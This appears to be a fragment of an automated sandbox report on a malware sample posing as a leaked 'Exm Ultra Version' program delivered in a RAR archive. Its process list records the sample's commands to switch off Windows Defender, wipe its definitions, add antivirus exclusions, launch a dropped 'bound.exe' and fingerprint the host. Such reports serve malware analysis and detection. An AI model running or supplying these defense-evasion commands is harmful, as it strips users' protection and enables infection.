Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3704 wrote to memory of 4928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3704 wrote to memory of 4928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3704 wrote to memory of 1664 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3704 wrote to memory of 1664 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3704 wrote to memory of 1664 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3704 wrote to memory of 1664 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3704 wrote to memory of 1664 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3704 wrote to memory of 1664 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3704 wrote to memory of 1664 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3704 wrote to memory of 1664 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3704 wrote to memory of 1664 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3704 wrote to memory of 1664 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3704 wrote to memory of 1664 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3704 wrote to memory of 1664 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3704 wrote to memory of 1664 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3704 wrote to memory of 1664 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3704 wrote to memory of 1664 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3704 wrote to memory of 1664 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3704 wrote to memory of 1664 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3704 wrote to memory of 1664 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3704 wrote to memory of 1664 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3704 wrote to memory of 1664 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3704 wrote to memory of 1664 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3704 wrote to memory of 1664 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3704 wrote to memory of 1664 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3704 wrote to memory of 1664 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3704 wrote to memory of 1664 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3704 wrote to memory of 1664 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3704 wrote to memory of 1664 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3704 wrote to memory of 1664 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3704 wrote to memory of 1664 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3704 wrote to memory of 1664 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3704 wrote to memory of 1664 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3704 wrote to memory of 1664 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3704 wrote to memory of 1664 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3704 wrote to memory of 1664 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3704 wrote to memory of 1664 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3704 wrote to memory of 1664 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3704 wrote to memory of 1664 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3704 wrote to memory of 1664 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3704 wrote to memory of 1664 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3704 wrote to memory of 1664 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3704 wrote to memory of 1664 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3704 wrote to memory of 1664 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3704 wrote to memory of 1664 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3704 wrote to memory of 1664 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3704 wrote to memory of 1664 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3704 wrote to memory of 1664 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3704 wrote to memory of 1664 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3704 wrote to memory of 1664 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3704 wrote to memory of 1664 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3704 wrote to memory of 1664 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3704 wrote to memory of 1664 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3704 wrote to memory of 4648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3704 wrote to memory of 4648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3704 wrote to memory of 1088 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3704 wrote to memory of 1088 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3704 wrote to memory of 1088 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3704 wrote to memory of 1088 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3704 wrote to memory of 1088 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3704 wrote to memory of 1088 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3704 wrote to memory of 1088 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3704 wrote to memory of 1088 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3704 wrote to memory of 1088 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://cdn.discordapp.com/attachments/1122175843565842633/1181259340129243156/EXM_Leaked.rar?ex=65ef267d&is=65dcb17d&hm=19bc37788f94fff83e2b28d6138daaf56dfdeead71c7e143547b0cdea4af58d1&

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --mojo-platform-channel-handle=5700 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --mojo-platform-channel-handle=5744 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4544 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --no-appcompat-clear --mojo-platform-channel-handle=6128 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --mojo-platform-channel-handle=6256 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --mojo-platform-channel-handle=5572 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=5924 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:8

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=5432 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=4884 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:8

C:\Program Files\7-Zip\7zFM.exe

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\EXM_Leaked.rar"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --mojo-platform-channel-handle=6448 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:8

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x30c 0x4c4

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=122.0.6261.70 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=122.0.2365.52 --initial-client-data=0x238,0x23c,0x240,0x234,0x24c,0x7ff9d0222e98,0x7ff9d0222ea4,0x7ff9d0222eb0

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=2040 --field-trial-handle=2044,i,2167273648988159966,7329034338797793841,262144 --variations-seed-version /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=2248 --field-trial-handle=2044,i,2167273648988159966,7329034338797793841,262144 --variations-seed-version /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=2680 --field-trial-handle=2044,i,2167273648988159966,7329034338797793841,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=4380 --field-trial-handle=2044,i,2167273648988159966,7329034338797793841,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=4380 --field-trial-handle=2044,i,2167273648988159966,7329034338797793841,262144 --variations-seed-version /prefetch:8

C:\Users\Admin\AppData\Local\Temp\7zOCD9D2288\Exm Ultra Version Leaked.exe

"C:\Users\Admin\AppData\Local\Temp\7zOCD9D2288\Exm Ultra Version Leaked.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4428 --field-trial-handle=2044,i,2167273648988159966,7329034338797793841,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --no-appcompat-clear --mojo-platform-channel-handle=4564 --field-trial-handle=2044,i,2167273648988159966,7329034338797793841,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4996 --field-trial-handle=2044,i,2167273648988159966,7329034338797793841,262144 --variations-seed-version /prefetch:8

C:\Users\Admin\AppData\Local\Temp\7zOCD9D2288\Exm Ultra Version Leaked.exe

"C:\Users\Admin\AppData\Local\Temp\7zOCD9D2288\Exm Ultra Version Leaked.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=5288 --field-trial-handle=2044,i,2167273648988159966,7329034338797793841,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=5316 --field-trial-handle=2044,i,2167273648988159966,7329034338797793841,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=5432 --field-trial-handle=2044,i,2167273648988159966,7329034338797793841,262144 --variations-seed-version /prefetch:1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\7zOCD9D2288\Exm Ultra Version Leaked.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "start bound.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\Users\Admin\AppData\Local\Temp\bound.exe

bound.exe

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'

C:\Windows\SYSTEM32\cmd.exe

cmd /c "Fn Opti.bat"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\7zOCD9D2288\Exm Ultra Version Leaked.exe'

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=5728 --field-trial-handle=2044,i,2167273648988159966,7329034338797793841,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

